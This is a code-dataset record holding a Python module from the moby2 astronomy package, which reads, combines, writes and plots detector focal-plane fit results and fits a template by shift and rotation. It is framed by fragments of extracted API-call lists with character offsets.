zdump(tmc_lists, '../temp_files/tmc_list_links.pkz')
| [
"openpyxl.load_workbook"
] | [((252, 338), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_1.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_1.xlsx')\n", (274, 338), False, 'import openpyxl\n'), ((778, 864), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_2.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_2.xlsx')\n", (800, 864), False, 'import openpyxl\n'), ((1300, 1386), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_3.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_3.xlsx')\n", (1322, 1386), False, 'import openpyxl\n'), ((1822, 1908), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_4.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_4.xlsx')\n", (1844, 1908), False, 'import openpyxl\n'), ((2344, 2430), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_5.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_5.xlsx')\n", (2366, 2430), False, 'import openpyxl\n'), ((2866, 2952), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_6.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_6.xlsx')\n", (2888, 2952), False, 'import openpyxl\n'), ((3388, 3474), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_7.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_7.xlsx')\n", (3410, 3474), False, 'import openpyxl\n'), ((3910, 3996), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_8.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_8.xlsx')\n", (3932, 3996), False, 'import openpyxl\n'), 
((4432, 4518), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_9.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_9.xlsx')\n", (4454, 4518), False, 'import openpyxl\n'), ((4957, 5044), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_10.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_10.xlsx')\n", (4979, 5044), False, 'import openpyxl\n'), ((5493, 5580), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_11.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_11.xlsx')\n", (5515, 5580), False, 'import openpyxl\n'), ((6029, 6116), 'openpyxl.load_workbook', 'openpyxl.load_workbook', (["(data_folder + 'filtered_INRIX_attribute_table_link_12.xlsx')"], {}), "(data_folder +\n 'filtered_INRIX_attribute_table_link_12.xlsx')\n", (6051, 6116), False, 'import openpyxl\n')] |
#!/usr/bin/python
from __future__ import print_function
from __future__ import absolute_import
from past.builtins import basestring
import sys
import numpy as np
import moby2
# Shortcut to the moby2 logger's trace function (level, message).
trace = moby2.util.log.logger.trace

# transitional...
# Printf-style formats used when writing each focal-plane-fit column
# to text or FITS tables.
_fp_formats = {
    'det_uid': '%4d',
    'ok': '%1d',
    'x0': '%9.6f',
    'x0_err': '%9.6f',
    'y0': '%9.6f',
    'y0_err': '%9.6f',
    'tau': '%8.5f',
    'tau_err': '%8.5f',
    'h': '%.4e',
    'w': '%9.6f',
    'sn': '%9.1f',
    'base': '%.5e',
    'n_obs': '%3d',
}

# Column order for FPFitFile I/O (det_uid is handled separately).
_fp_fields = ['ok', 'x0', 'x0_err', 'y0', 'y0_err', 'tau', 'tau_err',
              'h', 'w', 'sn', 'base', 'n_obs']

# One-line str.format template covering all fields, e.g. '{ok:1d} {x0:9.6f} ...'
_fp_columns_format_str = ' '.join(['{%s:%s}'%(k, _fp_formats[k][1:])
                                   for k in _fp_fields]) + '\n'
class FPFitFile(moby2.detectors._SimpleDetData):
    """Per-detector focal-plane fit results (position, time constant,
    amplitude, ...), with text/FITS I/O, combination of multiple fits,
    and diagnostic plotting helpers."""
    fields = _fp_fields
    dtypes = {'ok': bool, 'n_obs': int}
    columns_format_str = _fp_columns_format_str
    xcfs = '{det_uid:4d} {ok:1d} '\
        '{x0:9.6f} {x0_err:9.6f} {y0:9.6f} {y0_err:9.6f} '\
        '{tau:8.5f} {tau_err:8.5f} '\
        '{h:.4e} {w:9.6f} {sn:9.1f} {n_obs:3d}\n'
    header = '# det_uid ok x0 x0_err y0 y0_err '\
        'tau tau_err h w sn n_obs'

    def __init__(self, det_uid=None):
        """Allocate zeroed columns for the given detector ids (if any)."""
        if det_uid is not None:
            self.det_uid = np.array(det_uid, dtype='int64')
            n = len(det_uid)
            for f in self.fields:
                setattr(self, f, np.zeros(n, self.dtypes.get(f, 'float64')))

    def __repr__(self):
        name = repr(self.__class__)
        return '%s with %i det_uid for fields ' % (name, len(self.det_uid)) + \
            ','.join(self.fields)

    def update_row(self, row, data):
        """Copy the values in dict `data` (keyed by field name) into `row`."""
        for k in self.fields:
            if k in data:
                getattr(self, k)[row] = data[k]

    @classmethod
    def from_columns_file(cls, filename):
        """Load from a whitespace-delimited text file; the column count
        determines which of the historical layouts is being read."""
        data = np.loadtxt(filename, unpack=1)
        det_uid = data[0].astype('int')
        self = cls(det_uid)
        self.ok = data[1].astype('int').astype('bool')
        if len(data[2:]) == 11:
            self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.w, self.sn, self.base, self.n_obs = data[2:]
        elif len(data[2:-1]) == 9:
            self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.w, self.sn = data[2:-1]
            self.base = 0 * self.w
        elif len(data[2:-1]) == 8:
            self.x0, self.x0_err, self.y0, self.y0_err, self.tau, self.tau_err, self.h, self.sn = data[2:-1]
            self.w = 0 * self.x0
            self.base = 0 * self.x0
        elif len(data[2:-1]) == 4:
            self.x0, self.x0_err, self.y0, self.y0_err = data[2:-1]
            self.base = 0
        else:
            raise ValueError("Strange number of columns in %s" % filename)
        self.n_obs = data[-1].astype('int')
        return self

    @classmethod
    def from_file(cls, filename):
        """Dispatch on extension: FITS tables vs. text columns."""
        if filename.endswith('fits') or filename.endswith('fits.gz'):
            return cls.from_fits_table(filename)
        return cls.from_columns_file(filename)

    # This supercedes _SimpleDetData.write
    def write(self, filename, format=None):
        """Write all fields; format ('fits'/'txt') is inferred from the
        filename extension when not given."""
        if format is None:
            if filename.endswith('fits') or filename.endswith('fits.gz'):
                format = 'fits'
            else:
                format = 'txt'
        data = [('det_uid', self.det_uid)]
        for k in self.fields:
            v = getattr(self, k)
            if v.dtype == bool:
                # FITS/text tables don't take bools; store as 0/1.
                v = v.astype('int8')
            data.append((k, v))
        odb = moby2.util.StructDB.from_data(data, formats=_fp_formats)
        if format == 'fits':
            odb.to_fits_table(filename)
        elif format == 'txt':
            odb.to_column_file(filename)
        else:
            raise ValueError("Unknown format request, %s." % format)

    def write_reduced(self, filename, scale_amp=1.):
        """Write a compact table (good detectors only): det_uid, peak
        amplitude (optionally rescaled), time constant, and S/N."""
        format = 'txt'
        if filename.endswith('.fits') or filename.endswith('.fits.gz'):
            format = 'fits'
        s = self.ok.astype(bool)
        # det_uid peak_DAC SN tau
        data = [('det_uid', self.det_uid[s]),
                ('peak_dac', self.h[s] * scale_amp),
                ('time_const', self.tau[s]),
                ('sn', self.sn[s]),
                ]
        odb = moby2.util.StructDB.from_data(
            data, formats={'peak_dac': '%12.3f',
                           'time_const': '%12.5f',
                           'sn': '%12.3f'})
        if format == 'txt':
            odb.to_column_file(filename)
        elif format == 'fits':
            odb.to_fits_table(filename)

    @classmethod
    def from_focal_plane(cls, fp):
        """
        Initialize from a FocalPlane object.
        """
        self = cls(fp.det_uid)
        self.x0 = fp.x.copy()
        self.y0 = fp.y.copy()
        self.ok = fp.mask.copy()
        zeros = np.zeros(self.ok.shape)
        self.tau, self.h, self.w = zeros.copy(), zeros.copy(), zeros.copy()
        self.base = zeros
        return self

    @classmethod
    def combine_fits(cls, fits, template=None, params={}):
        """
        Combine fits by shifting each one to match a template, and
        averaging the good fits for each detector.

        If a template is not provided, match to the first one.
        """
        trace(1, 'Fitting and averaging %i fits' % len(fits))
        if template is None:
            template = fits[0]
        # Start by shifting each fit to match the template.
        orig_fits, fits = fits, []
        fitter = FPTemplateFitter()
        fitter.set_template(template)
        fit_params = {'shift': True,
                      'rotation': False}
        fit_params.update(params)
        fit_results = [None for fi in range(len(orig_fits))]
        for fi, f0 in enumerate(orig_fits):
            if f0.ok.sum() < params.get('min_dets', 50):
                trace(2, 'Discarding fit with only %i good fits' % f0.ok.sum())
                continue
            ok, result = fitter.fit(f0, fit_params)
            if not ok:
                trace(2, 'Discarding fit due to failed template match')
                continue
            f1 = f0.copy()
            f1.x0 += result[0]
            f1.y0 += result[1]
            fits.append(f1)
            fit_results[fi] = result
        trace(1, 'Cut %i of %i fits (increase verbosity to see why).' % \
                  (len(orig_fits) - len(fits), len(orig_fits)))
        if len(fits) == 0:
            return None, None
        # Report contributing fit sizes through the logger (was a stray
        # debug print).
        trace(2, 'Contributing fit sizes: %s' % [len(f.det_uid) for f in fits])
        n_det_uid = max([f.det_uid.max() for f in fits]) + 1
        output = cls(np.arange(n_det_uid))
        output.ok[:] = False
        ARCMIN = np.pi/180/60
        trace(1, 'Combining data for %i detectors' % n_det_uid)
        for uid in output.det_uid:
            ok = np.array([f.get_property('ok', det_uid=uid)[1]
                           for f in fits])
            x, y, tau = np.transpose([f.get_property(['x0','y0','tau'], det_uid=uid)[1]
                                        for f in fits])
            for _x in [x, y, tau]:
                # Yes, this happens...
                ok *= ~np.isnan(_x) * ~np.isinf(_x)
            x, y, tau = [_x[ok] for _x in [x,y,tau]]
            if ok.sum() < params.get('min_obs', 1):
                trace(2, 'Discarding det_uid=%i due to only %i contributors'
                          % (uid, ok.sum()))
                continue
            # Majority rules: iterate the centroid, dropping outliers
            # beyond max_separation each pass.
            x0, y0 = np.median(x), np.median(y)
            for iteration in [0,1,2]:
                d0 = ((x - x0)**2 + (y-y0)**2)**.5
                s0 = d0 < params.get('max_separation', 1)*ARCMIN
                if s0.sum() == 0:
                    break
                x0, y0 = x[s0].mean(), y[s0].mean()
            if s0.sum() <= 0:
                trace(2, 'Discarding det_uid=%i due to only %i items in '\
                          ' combination' % (uid, s0.sum()))
                continue
            vals = {
                'x0': x0, 'y0': y0,
                'x0_err': x[s0].std(),
                'y0_err': y[s0].std(),
                'tau': tau[s0].mean(),
                'tau_err': tau[s0].std(),
                'n_obs': s0.sum(),
                'ok': s0.sum() >= params.get('min_obs', 1) }
            output.update_row(uid, vals)
            trace(2, 'Result for det_uid=%i' % uid)
            for k in ['x0', 'y0', 'tau']:
                trace(2, ' %s = %10.5f +- %10.5f' % (k, vals[k], vals[k+'_err']))
        return output, fit_results

    def plot_positions(self, filename, auto_zoom=True, params={},
                       title='', fig=None):
        """Scatter-plot the fitted detector positions, auto-zoomed to the
        bulk of the array, and save to `filename`."""
        import pylab as pl
        if fig is None:
            pl.figure()
            pl.gcf().set_size_inches(6., 6.)
        else:
            pl.figure(fig.number)
        s = self.ok
        if s.sum() == 0:
            pl.title(title + ' - no good fits')
            pl.savefig(filename)
            pl.clf()
            # Nothing to plot; returning avoids empty-array math below
            # and keeps the figure saved above from being overwritten.
            return
        units = params.get('units', 'deg')
        scale = {'rad': 1., 'deg': 180/np.pi, 'arcmin': 60*180/np.pi}[units]
        x, y = self.x0[s]*scale, self.y0[s]*scale
        x0, y0 = np.median(x), np.median(y)
        r = ((x-x0)**2 + (y-y0)**2)**.5
        window = np.median(r)*3
        inside = r < params.get('zoom', scale*window)
        pl.scatter(x, y, alpha=0.5)
        if params.get('limits') is None:
            if np.any(inside):
                # Grow the default limits to include all "inside" points.
                for vect, limiter in [(x, pl.xlim), (y, pl.ylim)]:
                    lo, hi = limiter()
                    lo = min(lo, vect[inside].min())
                    hi = max(hi, vect[inside].max())
                    limiter(lo, hi)
        else:
            xlims, ylims = params['limits']
            pl.xlim(*xlims), pl.ylim(*ylims)
        pl.title(title + ' - %i dets outside window' % (~inside).sum())
        pl.xlabel('X (%s)' % units)
        pl.ylabel('Y (%s)' % units)
        def smart_locate(ax, n_max, bases=[1,2,5]):
            # Choose a 1/2/5 x 10^p tick spacing giving at most n_max ticks.
            x0, x1 = ax.get_view_interval()
            if x1 == x0:
                return
            delta = (x1-x0) / (n_max-1)
            # Find smallest base and p such delta < base*10^p
            log_spacing = min([
                np.ceil(np.log10(delta) - np.log10(b)) + np.log10(b)
                for b in bases])
            loc = pl.MultipleLocator(10**log_spacing)
            ax.set_major_locator(loc)
        smart_locate(pl.gca().xaxis, 6)
        smart_locate(pl.gca().yaxis, 9)
        pl.savefig(filename)
        pl.clf()
        pl.figure()

    def plot_rowcol_summaries(self, filename, array_data):
        """Save per-row/column image plots and histograms of the time
        constants, position scatter, and n_obs; `filename` is used as a
        prefix for the output .png files."""
        import pylab as pl
        def x_eyes(bads=None):
            # Mark bad fits with an x.
            if bads is None:
                bads = ~s
            pl.scatter(cols[bads], rows[bads], marker='x', edgecolor='gray')
        def limit_args(data, kw={}):
            # Color limits from the good detectors only.
            lo, hi = data.min(), data.max()
            if s.sum() > 1:
                lo, hi = data[s].min(), data[s].max()
            if hi == lo:
                hi = lo + 1
            kw.update({'vmin': lo, 'vmax': hi})
            return kw
        def bin(data, dtype='float'):
            # Arrange per-detector data on the (row, col) grid.
            out = np.zeros((n_rows, n_cols), dtype)
            out[rows, cols] = data
            return out
        def imshow_reformat():
            # Tighten boundaries, add labels...
            pl.xlabel('Column')
            pl.ylabel('Row')
            pl.xlim(-0.5, n_cols-0.5)
            pl.ylim(-0.5, n_rows-0.5)
        s = self.ok
        rows, cols = array_data.get_property(['row', 'col'], det_uid=self.det_uid)
        n_rows, n_cols = rows.max()+1, cols.max()+1
        # Init plotting
        pl.figure()
        pl.gcf().set_size_inches(6., 6.)
        pl.subplots_adjust(left=.1, right=.95, top=.95, bottom=.1,
                           hspace=.2, wspace=.3)
        title_fs = 12
        # Time constants...
        #
        pl.subplot(2,2,1)
        z = self.tau * 1e3
        pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
        pl.colorbar()
        x_eyes()
        pl.title('Time constants (ms)', fontsize=title_fs)
        imshow_reformat()
        pl.subplot(2,2,2)
        z = self.tau_err * 1e3
        pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
        pl.colorbar()
        x_eyes()
        pl.title('Time constant errors (ms)', fontsize=title_fs)
        imshow_reformat()
        if self.ok.sum() > 10:
            pl.subplot(2,2,3)
            pl.hist(self.tau[self.ok]*1e3, bins=20) #min(20,self.ok.sum()//10)
            pl.xlabel('Time constant (ms)')
            pl.ylabel('N_dets')
            pl.subplot(2,2,4)
            pl.hist(self.tau_err[self.ok]*1e3, bins=self.ok.sum()//10)
            pl.xlabel('Time constant errors (ms)')
            pl.ylabel('N_dets')
        pl.savefig(filename+'time_const.png')
        pl.clf()
        # Positions and stuff
        #
        for i in [0,1]:
            pl.subplot(2,2,1+i)
            z = {0: self.x0_err, 1:self.y0_err}[i]
            z = z * 180*3600/np.pi # to arcseconds
            pl.imshow(bin(z), interpolation='nearest', **limit_args(z))
            pl.colorbar()
            x_eyes()
            imshow_reformat()
            pl.title('%s position RMS' % {0: 'X', 1: 'Y'}[i],
                     fontsize=title_fs)
        pl.subplot(2,2,3)
        z = self.n_obs
        pl.imshow(bin(z), interpolation='nearest')
        pl.colorbar()
        imshow_reformat()
        pl.title('N_obs', fontsize=title_fs)
        pl.savefig(filename+'positions.png')
        pl.clf()
        # Destroy our subplot adjustments
        pl.figure()
class FPTemplateFitter:
    """
    Class for shift/rotate/shearing a template FPFitFile to match a
    target FPFitFile.

    After initializing, set the template to use:

        fitter = FPTemplateFitter()
        fitter.set_template(my_template_fp)
        ok, params = fitter.fit(my_target_fp)

    Those params are stored internally, so you can get the model FP:

        model_for_target = fitter.get_modeled(my_target_fp)
    """
    # Order of the 6 fit parameters, as stored in self.result[1].
    param_names = ['dx', 'dy', 'theta', 'scale', 'shear_theta', 'shear_scale']
    formats = {'dx': '%9.6f',
               'dy': '%9.6f',
               'scale': '%11.4e',
               'n_dets': '%4i',
               'theta': '%9.6f',
               'shear_scale': '%11.4e',
               'shear_theta': '%9.6f',
               }

    @classmethod
    def from_params(cls, opts, tod_info=None):
        """Build a fitter from a config dict: resolve the template file
        (via _execcfg / depot / explicit filename), load and rescale the
        positions, and install them as the template."""
        if '_execcfg' in opts:
            tod_id = moby2.scripting.products.get_tod_id(tod_info=tod_info)
            ic = moby2.scripting.execcfg.InputChooser()
            opts1 = ic.get_config(opts['_execcfg'], tod_id=tod_id)
            # _execcfg values are defaults; explicit opts take precedence.
            for k, v in list(opts1.items()):
                if not k in opts:
                    opts[k] = v
        if 'depot' in opts:
            depot = moby2.scripting.get_depot(opts['depot'])
            if not 'structure' in opts:
                opts['structure'] = '{tag}'
            filename = depot.get_full_path(**opts)
        else:
            filename = opts['filename']
        trace(2, 'Loading as template: %s' % filename)
        load_args = opts['column_def']
        pos_data = moby2.util.StructDB.from_column_file(filename, load_args)
        r = opts.get('template_rescale', (1.,1.))
        if 'ok' in pos_data.dtype.names:
            mask = (pos_data['ok'].astype(int) != 0)
        else:
            mask = np.ones(pos_data['x'].shape, bool)
        template_fits = FPFitFile(det_uid=pos_data['det_uid'][mask])
        template_fits.x0[:] = pos_data['x'][mask] * r[0]
        template_fits.y0[:] = pos_data['y'][mask] * r[1]
        template_fits.ok[:] = True
        self = cls()
        self.set_template(template_fits)
        return self

    def set_template(self, template):
        """Store the template and cache its center of mass as the pivot
        about which all rotations/scalings are applied."""
        self.template = template
        self.pivot = self.template.x0[self.template.ok].mean(), \
            self.template.y0[self.template.ok].mean()

    @staticmethod
    def _rotate(theta, x, y):
        """Rotate the points (x, y) by angle theta about the origin."""
        c, s = np.cos(theta), np.sin(theta)
        return x*c - y*s, y*c + x*s

    def model(self, params, x=None, y=None):
        """
        Shift, rotate, shear the current template according to params
        dict.  Return the resulting offsets (x, y).
        """
        dx, dy, theta, scale, sh_theta, sh_scale = params
        # scale parameters are stored as logs; exponentiate for use.
        scale, sh_scale = np.exp(scale), np.exp(sh_scale)
        # Shift away array center and rescale
        if x is None:
            tp = self.template
            x, y = tp.x0, tp.y0
        out_x, out_y = scale*(x - self.pivot[0]), scale*(y - self.pivot[1])
        # Shear
        out_x, out_y = self._rotate(+sh_theta, out_x, out_y)
        out_x *= sh_scale
        out_x, out_y = self._rotate(-sh_theta, out_x, out_y)
        # Rotate
        out_x, out_y = self._rotate(theta, out_x, out_y)
        # Restore array center and apply additional shift.
        return out_x + self.pivot[0] - dx, out_y + self.pivot[1] - dy

    def model_inverse(self, params, out_x, out_y):
        """
        Inverse of self.model.  Keep it up to date!
        """
        dx, dy, theta, scale, sh_theta, sh_scale = params
        scale, sh_scale = np.exp(scale), np.exp(sh_scale)
        # Remove additional shift.
        x, y = out_x - self.pivot[0] + dx, out_y - self.pivot[1] + dy
        # Unrotate
        x, y = self._rotate(-theta, x, y)
        # Unshear
        x, y = self._rotate(+sh_theta, x, y)
        x /= sh_scale
        x, y = self._rotate(-sh_theta, x, y)
        x, y = x/scale + self.pivot[0], y/scale + self.pivot[1]
        return x, y

    def fit(self, fp, params, trace_level=0):
        """
        Fit positions to a template, which is also an FPFitFile but
        may represent different det_uid.  'params' should be a dict
        like this one:

            params = {
              'shift': True,
              'rotation': True,
              'scale': True,
              'shear': True,
            }

        Returns (ok, params).  The fitted_template has the same
        det_uid as self.
        """
        template = self.template
        # Get mask of items that are ok in both the template and fits
        fp_ok = fp.ok.astype('bool').copy()
        _, temp_ok = template.get_property('ok', fp.det_uid)
        fp_ok *= temp_ok
        # Get the template and fits positions for those ok items
        _, x0 = template.get_property('x0', fp.det_uid[fp_ok])
        _, y0 = template.get_property('y0', fp.det_uid[fp_ok])
        x1, y1 = fp.x0[fp_ok], fp.y0[fp_ok]
        self.A = x0, y0
        self.B = x1, y1
        # Identify parameters we want to vary
        free_params = [params.get('shift', True)]*2
        free_params.append(params.get('rotation', True))
        free_params.append(params.get('scale', False))
        free_params.extend([params.get('shear', False)]*2)
        if fp.ok.sum() == 0:
            trace(trace_level+0, 'No items for template fit')
            self.result = False, [0. for f in free_params]
            return self.result
        trace(trace_level+0, 'Fitting template using %i items' % fp_ok.sum())
        # Start fit with shift based on mean displacement
        params0 = [x1.mean()-self.pivot[0], y1.mean()-self.pivot[1],
                   0., 0., 0., 0.]
        trace(trace_level+1, 'Starting parameters: %s' % str(params0))
        trace(trace_level+1, 'Free parameters: %s' % str(free_params))
        def fit_chi2(params):
            x_model, y_model = self.model(params, x0, y0)
            var = (x1 - x_model)**2 + (y1 - y_model)**2
            #return var.sum()
            # Attenuate contribution of outliers?  Not clear this works...
            mvar = np.median(var)
            var_roll = var * (10*mvar / (10*mvar + var))
            return var_roll.sum()
        # Minimize... start with position or all is lost.
        params1 = params0
        for iters in [0,1]:
            for free_mask in [
                # Fit position only...
                [True , True , False, False, False, False],
                # Fit rotation and scale
                [False, False, True , True , False, False],
                # Fit skew
                [False, False, False, False, True , True ],
                # Fit skew and position
                [True , True , False, False, True , True ],
                # Let everything float
                [True , True , True , True , True , True ]]:
                free = np.array(free_params) * free_mask
                if free.sum() > 0:
                    params1 = moby2.util.fitting.multi_fmin(
                        fit_chi2, params1, free=free, disp=0,
                        xtol=1e-6, ftol=1e-6)
                    trace(trace_level+2, 'params snapshot: %s' % str(params1))
        trace(trace_level+1, 'Final parameters: %s' % str(params1))
        self.result = True, params1
        return self.result

    def check_result(self, opts):
        """
        Check self.result against ranges passed in by user.  User
        passes in a dict with keys like "<name>_range", where <name>
        is one of self.param_names.  The values are the range (lo, hi) of
        acceptable values.  If any range checks fail, the function
        returns false.
        """
        ok, params = self.result
        if not ok:
            return False
        for k, v in zip(self.param_names, params):
            k = '%s_range' % k
            if not k in opts: continue
            if not ((opts[k][0] <= v) and (v < opts[k][1])):
                return False
        return True

    def get_modeled(self, det_uid=None):
        """
        Return a FPFitFile with the modeled detector positions.  Pass
        in the desired det_uid, or the template det_uid will be
        used.
        """
        if det_uid is None:
            # Bug fix: the fitter itself has no det_uid attribute; the
            # documented default is the template's det_uid.
            det_uid = self.template.det_uid
        matched = FPFitFile(det_uid=det_uid)
        _, ok = self.template.get_property('ok', matched.det_uid)
        _, x0 = self.template.get_property('x0', matched.det_uid)
        _, y0 = self.template.get_property('y0', matched.det_uid)
        matched.ok = ok
        params = self.result[1]
        matched.x0, matched.y0 = self.model(params, x0, y0)
        return matched

    def make_plots(self, fp, modeled, plot_prefix='./',
                   title=None):
        """
        Show fit quality in a few plots.
        """
        import pylab as pl
        def sane_axes():
            fig.gca().xaxis.set_major_locator(pl.MaxNLocator(4))
            fig.gca().yaxis.set_major_locator(pl.MaxNLocator(5))
            fig.gca().set_aspect('equal', 'datalim')
        DEG = 180./np.pi
        fig = pl.figure()
        fig.set_size_inches(8., 4.)
        pl.subplots_adjust(left=.1, right=.98, top=.85, bottom=.1,
                           hspace=.2, wspace=.3)
        pl.subplot(121)
        tp = self.template
        s, x, y = tp.ok, tp.x0, tp.y0
        pl.scatter(x[s], y[s], marker='o', s=4, alpha=.5)
        pl.xlabel('X')
        pl.ylabel('Y')
        pl.title('Input template')
        sane_axes()
        # The model positions
        pl.subplot(122)
        s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
        pl.scatter(x[s], y[s], alpha=.2)
        # And the fit positions
        s, x, y = fp.ok, fp.x0 * DEG, fp.y0 * DEG
        pl.scatter(x[s], y[s], marker='x')
        # Now connect them with lines...
        u = fp.det_uid[s]
        ok1, (x1, y1) = modeled.get_property(['x0','y0'], det_uid=u)
        x, y = x[s], y[s]
        for i in ok1.nonzero()[0]:
            pl.plot([x1[i]*DEG, x[i]], [y1[i]*DEG, y[i]], color='k', alpha=.4)
        pl.xlabel('X (deg)')
        pl.ylabel('Y (deg)')
        pl.title('Fitted result')
        sane_axes()
        if title is not None:
            pl.figtext(0.5, 0.93, title, va='bottom', ha='center')
        pl.savefig(plot_prefix + 'fit.png')
        pl.figure() # destroy our settings...

    def old_make_plots(self, fp, modeled, plot_prefix='./',
                       title=None):
        """
        Show fit quality in a few plots.
        """
        import pylab as pl
        DEG = 180./np.pi
        pl.figure()
        pl.gcf().set_size_inches(6., 6.)
        pl.subplots_adjust(left=.15, right=.95, top=.90, bottom=.1,
                           hspace=.2, wspace=.3)
        tp = self.template
        s, x, y = tp.ok, tp.x0, tp.y0
        pl.scatter(x[s], y[s], marker='x')
        pl.savefig(plot_prefix + '0template.png')
        pl.clf()
        s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
        pl.scatter(x[s], y[s], alpha=.2)
        pl.xlabel('X (deg)')
        pl.ylabel('Y (deg)')
        pl.savefig(plot_prefix + '1model.png')
        pl.clf()
        # The model positions
        s, x, y = modeled.ok, modeled.x0 * DEG, modeled.y0 * DEG
        pl.scatter(x[s], y[s], alpha=.2)
        # And the fit positions
        s, x, y = fp.ok, fp.x0 * DEG, fp.y0 * DEG
        pl.scatter(x[s], y[s], marker='x')
        # Now connect them with lines...
        u = fp.det_uid[s]
        ok1, (x1, y1) = modeled.get_property(['x0','y0'], det_uid=u)
        x, y = x[s], y[s]
        for i in ok1.nonzero()[0]:
            pl.plot([x1[i]*DEG, x[i]], [y1[i]*DEG, y[i]], color='k', alpha=.4)
        pl.xlabel('X (deg)')
        pl.ylabel('Y (deg)')
        if title is not None:
            pl.title(title)
        pl.savefig(plot_prefix + '2fit.png')
        pl.figure() # destroy our settings...

    # Formatted output...
    def get_ascii(self, names=None, params=None):
        """Format the given (or last-fit) parameters as one text row."""
        if names is None:
            names = self.param_names
        if params is None:
            params = self.result[1]
        idx = [self.param_names.index(f) for f in names]
        text = [ self.formats.get(n, '%11.4e') % params[i]
                 for n,i in zip(names,idx) ]
        return ' '.join(text)

    @staticmethod
    def write_fit_list(filename, keys, fits, format=None):
        """Write one row per (key, fitter) pair; FITS table when
        format=='fits', otherwise text to a path or open file object."""
        if format == 'fits':
            columns = list(zip(*[f.result[1] for f in fits]))
            col_defs = ([('id', keys), ('ok', [int(f.result[0]) for f in fits])] +
                        list(zip(fits[0].param_names, columns)))
            db_out = moby2.util.StructDB.from_data(
                col_defs, formats=fits[0].formats)
            db_out.to_fits_table(filename)
        else:
            # Only close the stream if we opened it ourselves (fixes a
            # file-handle leak when a path was passed in).
            close_after = False
            if isinstance(filename, basestring):
                filename = open(filename, 'w')
                close_after = True
            names = fits[0].param_names
            filename.write('# %s\n' % ' '.join(names))
            for key, fit in zip(keys, fits):
                text = fit.get_ascii(names=names)
                filename.write('%s %s\n' % (key, text))
            if close_after:
                filename.close()
| [
"pylab.title",
"pylab.scatter",
"numpy.log10",
"pylab.subplots_adjust",
"moby2.scripting.get_depot",
"pylab.MaxNLocator",
"pylab.savefig",
"pylab.xlabel",
"moby2.scripting.execcfg.InputChooser",
"numpy.array",
"numpy.sin",
"moby2.util.StructDB.from_column_file",
"pylab.gca",
"numpy.arange"... | [((1905, 1935), 'numpy.loadtxt', 'np.loadtxt', (['filename'], {'unpack': '(1)'}), '(filename, unpack=1)\n', (1915, 1935), True, 'import numpy as np\n'), ((3620, 3676), 'moby2.util.StructDB.from_data', 'moby2.util.StructDB.from_data', (['data'], {'formats': '_fp_formats'}), '(data, formats=_fp_formats)\n', (3649, 3676), False, 'import moby2\n'), ((4358, 4469), 'moby2.util.StructDB.from_data', 'moby2.util.StructDB.from_data', (['data'], {'formats': "{'peak_dac': '%12.3f', 'time_const': '%12.5f', 'sn': '%12.3f'}"}), "(data, formats={'peak_dac': '%12.3f',\n 'time_const': '%12.5f', 'sn': '%12.3f'})\n", (4387, 4469), False, 'import moby2\n'), ((4935, 4958), 'numpy.zeros', 'np.zeros', (['self.ok.shape'], {}), '(self.ok.shape)\n', (4943, 4958), True, 'import numpy as np\n'), ((9370, 9397), 'pylab.scatter', 'pl.scatter', (['x', 'y'], {'alpha': '(0.5)'}), '(x, y, alpha=0.5)\n', (9380, 9397), True, 'import pylab as pl\n'), ((9894, 9921), 'pylab.xlabel', 'pl.xlabel', (["('X (%s)' % units)"], {}), "('X (%s)' % units)\n", (9903, 9921), True, 'import pylab as pl\n'), ((9930, 9957), 'pylab.ylabel', 'pl.ylabel', (["('Y (%s)' % units)"], {}), "('Y (%s)' % units)\n", (9939, 9957), True, 'import pylab as pl\n'), ((10528, 10548), 'pylab.savefig', 'pl.savefig', (['filename'], {}), '(filename)\n', (10538, 10548), True, 'import pylab as pl\n'), ((10557, 10565), 'pylab.clf', 'pl.clf', ([], {}), '()\n', (10563, 10565), True, 'import pylab as pl\n'), ((10574, 10585), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (10583, 10585), True, 'import pylab as pl\n'), ((11714, 11725), 'pylab.figure', 'pl.figure', ([], {}), '()\n', (11723, 11725), True, 'import pylab as pl\n'), ((11775, 11865), 'pylab.subplots_adjust', 'pl.subplots_adjust', ([], {'left': '(0.1)', 'right': '(0.95)', 'top': '(0.95)', 'bottom': '(0.1)', 'hspace': '(0.2)', 'wspace': 